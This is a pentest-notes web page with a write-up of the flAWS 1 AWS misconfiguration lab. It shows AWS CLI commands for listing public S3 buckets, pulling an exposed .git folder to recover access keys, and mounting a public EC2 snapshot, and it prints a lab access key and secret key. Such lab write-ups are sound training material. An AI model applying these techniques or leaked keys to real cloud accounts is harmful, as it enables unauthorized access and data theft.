CSbyGB - Pentips
Buy me a tea
  • CS By GB - PenTips
    • Welcome to CSbyGB's Pentips
  • Networking, Protocols and Network pentest
    • Basics
    • DNS
    • FTP
    • HTTP & HTTPS
    • IMAP
    • IPMI
    • MSSQL
    • MYSQL
    • NFS
    • Oracle TNS
    • POP3
    • RDP
    • RPC
    • Rservices
    • Rsync
    • SMB
    • SMTP
    • SNMP
    • SSH
    • VOIP and related protocols
    • Winrm
    • WMI
    • Useful tips when you find unknown ports
  • Ethical Hacking - General Methodology
    • Introduction
    • Information Gathering
    • Scanning & Enumeration
    • Exploitation (basics)
    • Password Attacks
    • Post Exploitation
    • Lateral Movement
    • Proof-of-Concept
    • Post-Engagement
    • MITRE ATT&CK
  • External Pentest
    • External Pentest
  • Web Pentesting
    • Introduction to HTTP and web
    • Enumeration
    • OWASP Top 10
    • General Methodo & Misc Tips
    • Web Services and API
    • Vunerabilities and attacks
      • Clickjacking
      • CORS (Misconfigurations)
      • CSRF
      • SSRF
      • Bypass captcha
      • Template Injection (client and server side)
      • MFA bypass
      • XXE
    • Exposed git folder
    • Docker exploitation and Docker vulnerabilities
    • Websockets
  • Mobile App Pentest
    • Android
    • IOS
  • Wireless Pentest
    • Wireless pentest
  • Cloud Pentest
    • Cloud Pentest
    • Google Cloud Platform
    • AWS
  • Thick Client Pentest
    • Thick Client
  • Hardware Pentest
    • ATM
    • IoT
  • Secure Code Review
    • Secure code review
    • Java notes for Secure Code Review
  • AI & AI Pentest
    • MITRE ATLAS
    • OWASP ML and LLM
    • Hugging face
    • AI Python
    • Gemini
    • Ollama
  • Checklist
    • Web Application and API Pentest Checklist
    • Linux Privesc Checklist
    • Mobile App Pentest Checklist
  • Tools
    • Burpsuite
    • Android Studio
    • Frida
    • CrackMapExec
    • Netcat and alternatives
    • Nmap
    • Nuclei
    • Evil Winrm
    • Metasploit
    • Covenant
    • Mimikatz
    • Passwords, Hashes and wordlist tools
    • WFuzz
    • WPScan
    • Powershell Empire
    • Curl
    • Vulnerability Scanning tools
    • Payload Tools
    • Out of band Servers
    • STEWS
    • Webcrawlers
    • Websocat
  • VM and Labs
    • General tips
    • Setup your pentest lab
  • Linux
    • Initial Foothold
    • Useful commands and tools for pentest on Linux
    • Privilege Escalation
      • Kernel Exploits
      • Password and file permission
      • Sudo
      • SUID
      • Capabilities
      • Scheduled tasks
      • NFS Root Squashing
      • Services
      • PATH Abuse
      • Wildcard Abuse
      • Privileged groups
      • Exploit codes Cheat Sheet
  • Windows
    • Offensive windows
    • Enumeration and general Win tips
    • Privilege Escalation
    • Active Directory
    • Attacking Active Directory
      • LLMNR Poisoning
      • SMB Relay Attacks
      • Shell Access
      • IPv6 Attacks
      • Passback Attacks
      • Abusing ZeroLogon
    • Post-Compromise Enumeration
      • Powerview or SharpView (.NET equivalent)
      • AD Manual Enumeration
      • Bloodhound
      • Post Compromise Enumeration - Resources
    • Post Compromise Attacks
      • Pass the Password / Hash
      • Token Impersonation - Potato attacks
      • Kerberos
      • GPP/cPassword Attacks
      • URL File Attack
      • PrintNightmare
      • Printer Bug
      • AutoLogon exploitation
      • Always Installed Elevated exploitation
      • UAC Bypass
      • Abusing ACL
      • Unconstrained Delegation
    • Persistence
    • AV Evasion
    • Weaponization
    • Useful commands in Powershell, CMD and Sysinternals
    • Windows Internals
  • Programming
    • Python programming
    • My scripts
    • Kotlin
  • Binary Exploitation
    • Assembly
    • Buffer Overflow - Stack based - Winx86
    • Buffer Overflow - Stack based - Linux x86
  • OSINT
    • OSINT
    • Create an OSINT lab
    • Sock Puppets
    • Search engines
    • OSINT Images
    • OSINT Email
    • OSINT Password
    • OSINT Usernames
    • OSINT People
    • OSINT Social Media
    • OSINT Websites
    • OSINT Business
    • OSINT Wireless
    • OSINT Tools
    • Write an OSINT report
  • Pentester hardware toolbox
    • Flipper Zero
    • OMG cables
    • Rubber ducky
  • Post Exploitation
    • File transfers between target and attacking machine
    • Maintaining Access
    • Pivoting
    • Cleaning up
  • Reporting
    • How to report your findings
  • Red Team
    • Red Team
    • Defenses Enumeration
    • AV Evasion
  • Writeups
    • Hackthebox Tracks
      • Hackthebox - Introduction to Android Exploitation - Track
    • Hackthebox Writeups
      • Hackthebox - Academy
      • Hackthebox - Access
      • Hackthebox - Active
      • Hackthebox - Ambassador
      • Hackthebox - Arctic
      • Hackthebox - Awkward
      • Hackthebox - Backend
      • Hackthebox - BackendTwo
      • Hackthebox - Bastard
      • Hackthebox - Bastion
      • Hackthebox - Chatterbox
      • Hackthebox - Devel
      • Hackthebox - Driver
      • Hackthebox - Explore
      • Hackthebox - Forest
      • Hackthebox - Good games
      • Hackthebox - Grandpa
      • Hackthebox - Granny
      • Hackthebox - Inject
      • Hackthebox - Jeeves
      • Hackthebox - Jerry
      • Hackthebox - Lame
      • Hackthebox - Late
      • Hackthebox - Love
      • Hackthebox - Mentor
      • Hackthebox - MetaTwo
      • Hackthebox - Monteverde
      • Hackthebox - Nibbles
      • Hackthebox - Optimum
      • Hackthebox - Paper
      • Hackthebox - Photobomb
      • Hackthebox - Poison
      • Hackthebox - Precious
      • Hackthebox - Querier
      • Hackthebox - Resolute
      • Hackthebox - RouterSpace
      • Hackthebox - Sauna
      • Hackthebox - SecNotes
      • Hackthebox - Shoppy
      • Hackthebox - Soccer
      • Hackthebox - Steamcloud
      • Hackthebox - Toolbox
      • Hackthebox - Vault
      • Hackthebox - Updown
    • TryHackme Writeups
      • TryHackMe - Anonymous
      • TryHackMe - Blaster
      • TryHackMe - CMesS
      • TryHackMe - ConvertMyVideo
      • TryHackMe - Corridor
      • TryHackMe - LazyAdmin
      • TryHackMe - Looking Glass
      • TryHackMe - Nahamstore
      • TryHackMe - Overpass3
      • TryHackMe - OWASP Top 10 2021
      • TryHackMe - SimpleCTF
      • TryHackMe - SQL Injection Lab
      • TryHackMe - Sudo Security Bypass
      • TryHackMe - Tomghost
      • TryHackMe - Ultratech
      • TryHackMe - Vulnversity
      • TryHackMe - Wonderland
    • Vulnmachines Writeups
      • Web Labs Basic
      • Web Labs Intermediate
      • Cloud Labs
    • Mobile Hacking Lab
      • Mobile Hacking Lab - Lab - Config Editor
      • Mobile Hacking Lab - Lab - Strings
    • Portswigger Web Security Academy Writeups
      • PS - DomXSS
      • PS - Exploiting vulnerabilities in LLM APIs
    • OWASP projects and challenges writeups
      • OWASP MAS Crackmes
    • Vulnerable APIs
      • Vampi
      • Damn Vulnerable Web Service
      • Damn Vulnerable RESTaurant
    • Various Platforms
      • flAWS 1&2
  • Digital skills
    • How to make a gitbook
    • Marp
    • Linux Tips
    • Docker
    • VSCodium
    • Git Tips
    • Obsidian
  • Durable skills
    • Durable skills wheel/Roue des compétences durables
  • Projects
    • Projects
      • Technical Projects
      • General Projects
  • Talks
    • My Talks about Web Pentest
    • My talks about Android Application hacking
    • Other of my talks and Podcast
  • Resources
    • A list of random resources
Powered by GitBook
On this page
  • flAWS 1
  • Level 1
  • Level 2
  • Level 3
  • Level 4
  • Resources
  1. Writeups
  2. Various Platforms

flAWS 1&2

PreviousVarious PlatformsNextHow to make a gitbook

Last updated 1 year ago

These labs are a great introduction for AWS Pentest

flAWS 1

Level 1

First task is to find the first sub-domain.

  • Let's make a dig command first

  • Now we can nslookup on one of the IP address

We now have more details about the s3 bucket, we can use aws cli aws s3 ls s3://flaws.cloud --no-sign-request --region us-west-2 here we are doing an ls on the bucket and we specify the region.

Level 2

Let's check the bucket but this time with our own user aws s3 --profile gabrielle ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud

And then again we can access the secret html file and we end up here

Level 3

Let's try to ls the bucket //level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/

We can see a git folder. This definitely something I would consider in a web pentest, so let's explore it.

Let's take the full git folder with aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/ --profile gabrielle .

The commit message is promising

Ok in order to be able to use git diff we need to get the full thing aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ --profile gabrielle .

Here is what we get with git diff

Here is some exploration we can do with git.

And using git extractor (if we want to go faster) we can find the access_keys!! :D

Now we need to configure a new profile with these creds

Now we just need to list the buckets of our new profile aws --profile flaws s3 ls

We can now access to the next level using the url http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud/

Level 4

access_key AKIAJ366LIPB4IJKT7SA
secret_access_key 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

When accessing the provided link we are prompted for credentials

The big hint we had here that there was a snapshot made of the EC2. Maybe it is publicly accessible.

Let's list the snapshots for our profile aws --profile flAWS ec2 describe-snapshots

This returned a lots of result. Turns out that these are all the publicly accessible snapshots...

We need to check the account id of our new profile.

Now we can specify the owner ID in order to get our specific snapshot.

Here is what I got for a snapshot. Not really satisfying

I had to use the hint because I was stuck here and I realized that we needed to specify another region than the one I configured. I am not sure how we should figure it out except by trying all the regions one by one until we get something. So we can either reconfigure our profile with the region us-west-2 or specify the region in the commande to list the buckets like this aws --profile flAWS ec2 describe-snapshots --owner-id 975426262029 --region us-west-2. I just reconfigured my profile. And it worked we got the snapshot description below

Apparently we will need to mount the snapshot in our own AWS account.

aws --profile gabrielle ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89

I personnaly had a few issues because my settings were for another region and so to modify permission I had to delete my current region to move it to another one. Long story short, I stopped here for this challenge.

However I really recommend if you have the same problem and don't want to create another account or delete your current settings that you read the writeup it is really interesting.

Executeatwill's one is really good but there are a few others available online.

Resources

If we check the html file we end up on this page

I litterally pulled my hair here xD. I had an access denied An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied even with my user, what solved the problem is that I needed to add said user to a group in order for it to have permissions. See more about this Once I had done this I tried the command again and got the ls

Now we need to create and ec2 instance. I can only recommend that you checkout executeatwill's writeup for this step. You can also find it in the AWS chapter of my pentips

here
here
Flaws.Cloud Walkthrough Level 1 by Marc Lopez on Youtube
Flaws.Cloud Walkthrough Level 2 by Marc Lopez on Youtube
Flaws.Cloud Walkthrough Level 3 by Marc Lopez on Youtube
Flaws.Cloud Walkthrough Level 4 by Marc Lopez on Youtube
A Beginner's Guide To Exploiting AWS Misconfigurations | Flaws.Cloud Full Walkthrough by Cyberwox
Flaws.cloud Walkthrough by Executeatwill
Hacking AWS - Flaws.Cloud Walkthrough by Phil Keeble
flAWS
flAWS2
level 1
dig
nslookup
secret file
Level 2
ls
Access to Level 3 unlocked
Level 3
git
commit msg
git diff
git log
git status
git extractor
access keys
aws configure
list bucket
Level 4
Request to new url
account ID
snapshot empty
snapshot